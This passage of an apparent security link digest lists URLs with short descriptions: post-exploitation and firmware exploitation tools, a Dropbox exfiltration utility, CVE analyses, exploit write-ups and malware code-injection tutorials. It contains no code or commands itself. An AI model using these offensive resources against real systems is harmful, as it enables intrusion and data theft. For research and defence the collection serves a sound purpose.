Description: SharpSploit is a .NET post-exploitation library written in C#.

URL: https://github.com/Cr4sh/fwexpl
Description: PC firmware exploitation tool and library.

URL: https://github.com/P1CKLES/SharpBox
Description: Tool for compressing, encrypt and exfil data to DropBox via API.

URL: https://github.com/chudel/openfender
Description: Quest One Identity Defender Soft Token to Google Auth QR Code Converter.


'  ╔═╗┌─┐┌─┐┬ ┬┬─┐┬┌┬┐┬ ┬
'  ╚═╗├┤ │  │ │├┬┘│ │ └┬┘
'  ╚═╝└─┘└─┘└─┘┴└─┴ ┴  ┴ 
'  All about security issues.


URL: https://flatkill.org/
Description: Flatpak - a security nightmare.

URL: http://bit.ly/2C601gF (+)
Description: Bitcoin Core Bug CVE-2018–17144 - An Analysis.

URL: https://geosn0w.github.io/Jailbreaks-Demystified/
Description: Jailbreaks Demystified.

URL: https://www.nc-lp.com/blog/disguise-phar-packages-as-images
Description: Disguise PHAR packages as images.

URL: http://bit.ly/2yxlRWY (+)
Description: Collecting Shells by the Sea of NAS Vulnerabilities.

URL: http://bit.ly/2NC71nl (+)
Description: PRTG Network Monitor Privilege Escalation (CVE-2018-17887).

URL: https://prdeving.wordpress.com/2018/09/21/hiding-malware-in-windows-code-injection/
Description: Hiding malware in Windows – The basics of code injection.

URL: https://ewilded.blogspot.pt/2018/01/vulnserver-my-kstet-exploit-delivering.html
Related: http://www.thegreycorner.com/2010/12/introducing-vulnserver.html
Description: My KSTET exploit - Delivering the final shellcode via active server socket.

URL: http://bit.ly/2C9esjR (+)
Description: Authentication bypass vulnerability (W/PE) in WD My Cloud (CVE-2018-17153).

URL: https://alephsecurity.com/2018/01/22/qualcomm-edl-1/
Code: https://github.com/alephsecurity/edlrooter
Description: Exploiting Qualcomm EDL Programmers (CVE-2017-13174/CVE-2017-5947).

URL: http://0xeb.net/2018/03/using-z3-with-ida-to-simplify-arithmetic-operations-in-functions/
Description: Using Z3 with IDA to simplify arithmetic operations in functions.


'  ╔═╗┬ ┬┌┐┌
'  ╠╣ │ ││││
'  ╚  └─┘┘└┘
'  Spare time?


URL: http://telegra.ph/
Description: Write and Share!

URL: https://blog.bejarano.io/hardening-macos.html
Description: Hardening macOS.

URL: https://github.com/opsxcq/docker-tor-hiddenservice-nginx
Description: Easily setup a hidden service inside the Tor network.


'  ╔═╗┬─┐┌─┐┌┬┐┬┌┬┐┌─┐
'  ║  ├┬┘├┤  │││ │ └─┐
'  ╚═╝┴└─└─┘─┴┘┴ ┴ └─┘
'  Content Helpers (0x)

52656e61746f20526f64726967756573202d204073696d7073306e202d20687474703a2f2f706174686f6e70726f6a6563742e636f6d